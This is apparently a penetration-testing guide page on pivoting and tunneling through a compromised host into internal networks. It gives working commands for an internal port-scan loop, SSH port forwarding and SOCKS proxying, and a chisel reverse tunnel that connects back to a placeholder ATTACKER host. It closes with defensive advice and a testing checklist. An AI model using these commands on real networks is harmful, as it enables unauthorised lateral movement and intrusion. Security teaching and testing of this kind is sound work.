Pivoting and Tunneling
You rarely compromise your final target directly. The norm is to take an exposed machine (DMZ, web server) and use it as a springboard to reach internal networks not accessible from outside. Pivoting is using a compromised host as a bridge into those networks, and tunnels are the mechanisms (port forwarding, SOCKS, VPN) that carry your traffic through it. Without pivoting, an internal pentest stops at the first machine.
flowchart LR
A[Attacker] -->|"tunnel / proxy (SOCKS)"| H["Compromised host (pivot)"]
H -->|"access"| N["Non-routable internal network"]
The compromised host has access to networks you don’t: another interface, an internal subnet, a firewall that lets it out. Pivoting reuses that access. Two forms: port forwarding (redirect a specific port) and a SOCKS proxy (route any traffic/tool through the pivot).
Recon from the pivot
Section titled “Recon from the pivot”First, what can the compromised host reach?
ip a ; ip route # other interfaces/subnetsarp -a ; cat /etc/hosts # known neighbors# light scan of the internal network from the pivot (without uploading nmap)for i in $(seq 1 254); do (echo >/dev/tcp/10.10.10.$i/445) 2>/dev/null && echo "10.10.10.$i:445"; doneSSH: the cleanest pivoting
Section titled “SSH: the cleanest pivoting”If you have SSH, you have almost everything:
# Local port forward: a local port -> internal service via the pivotssh -L 8080:10.10.10.5:80 user@pivot # your localhost:8080 = internal:80# Remote port forward: expose a port of yours on the pivotssh -R 9001:localhost:9001 user@pivot# Dynamic (SOCKS proxy): route ANY tool into the internal networkssh -D 1080 user@pivot # SOCKS on localhost:1080Then, with proxychains, any tool exits through the SOCKS:
# /etc/proxychains.conf -> socks5 127.0.0.1 1080proxychains nmap -sT -Pn 10.10.10.5proxychains nxc smb 10.10.10.0/24When there’s no SSH: tunneling tools
Section titled “When there’s no SSH: tunneling tools”chisel HTTP server/client -> reverse SOCKS (widely used; upload a binary to the pivot) # attacker: chisel server -p 8000 --reverse # pivot: chisel client ATTACKER:8000 R:socksligolo-ng tunnel with a TUN interface -> the internal network "appears" as a local interface (convenient)sshuttle "VPN over SSH" -> transparently routes the internal subnetsocat / netcat one-off port relaysmetasploit route add + socks_proxy (autoroute)ligolo-ng and sshuttle stand out for convenience: they route whole subnets without configuring proxychains per tool.
Chained pivoting (double pivot)
Section titled “Chained pivoting (double pivot)”Sometimes the target is two hops away: you compromise A (DMZ) → from A you reach B (internal) → from B to C (deeper internal). Tunnels are chained (SSH -J, nested chisel/ligolo) to reach ever-deeper networks.
For the defense
Section titled “For the defense”- Strict segmentation: a DMZ host shouldn’t reach the internal network; microsegmentation.
- Egress filtering: limit what outbound connections each host can make (stops reverse SOCKS/C2).
- Detection: unusual outbound connections (chisel/ligolo to external IPs), tunneled traffic, a host scanning internally.
- EDR/NDR detecting tunneling binaries and pivoting patterns; internal honeypots.
- Principle: a compromised host shouldn’t be able to become a bridge to the critical.
Testing checklist
Section titled “Testing checklist”- Enumerate which networks/interfaces the pivot reaches
- Light scan of the internal network from the pivot
- SSH port forward (local/remote) to an internal service
- Dynamic SOCKS (ssh -D / chisel / ligolo) + proxychains
- Route your tools into the internal network (nmap/nxc)
- Chained pivoting if the target is several hops away
- Blue: do segmentation and egress filtering limit the pivot?
- Document the internal subnets reached